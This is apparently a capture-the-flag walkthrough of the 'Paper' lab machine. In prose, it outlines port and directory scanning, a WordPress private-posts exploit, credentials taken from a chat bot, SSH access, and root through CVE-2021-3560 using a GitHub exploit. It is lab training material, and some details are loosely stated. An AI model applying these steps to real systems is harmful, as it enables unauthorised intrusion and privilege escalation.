#Paper

Step1: We start with passive reconnaissance. Using namp we scan for open port and find port 22, 80, 443 were open.

We opened the page with the browser and find that our webpage is just details Apache server and didn’t find any login page or anything useful.

Step2: With the help of burp suit, we just intercept the request and find another domain name office.paper so we just add that to our /etc/hosts and get another webpage.

Step3: We go for hidden directory scan using gobuster and seclists and find a WordPress login page

Since this is a WordPress page, we search for any possible vulnerabilities for the corresponding version in searchsploit. We found a possible exploit named viewing unauthenticated / Password/ Private Posts. Just download the file and while reading we got a payload. It was a command injection.

We inject the payload to the domain name and got another page

Now we got another secret registration URL for employee chat system chat.office.paper. Now add this domain to our /etc/hosts.

Step4: Login page looks somewhat like this and we logged in with fake credentials. Once we get in we got a general conversation box were few company employees along with there chat bot have some crucial chats

Now we fetch for the data along with the chat bot

Step5: Now we have credentials for login so through ssh port try to log in to the server

We are in trouble!!.. Username recyclops didn’t worked here, so we changed the username to Dwight the developer of bot recyclops.

Now we get inside and got the user flag.

Step6: Now for privilege escalation we run the script linpeas.sh to find all the vulnerability of the server. We got a CVE named CVE-2021-3560

We done a little search on github and got the exploit code for the vulnerability

Step7: We cloned the exploit to our local machine. Created a file poc.py and filled it with our exploit code. Changed the permission of the file and just executed it. In order to work properly just add a username and password along with the code as shown in figure.

Once we switched to the user that we created execute sudo bash

Jackpot now we are root user and move to root directory and ls. We get the root flag

Pwned.!!!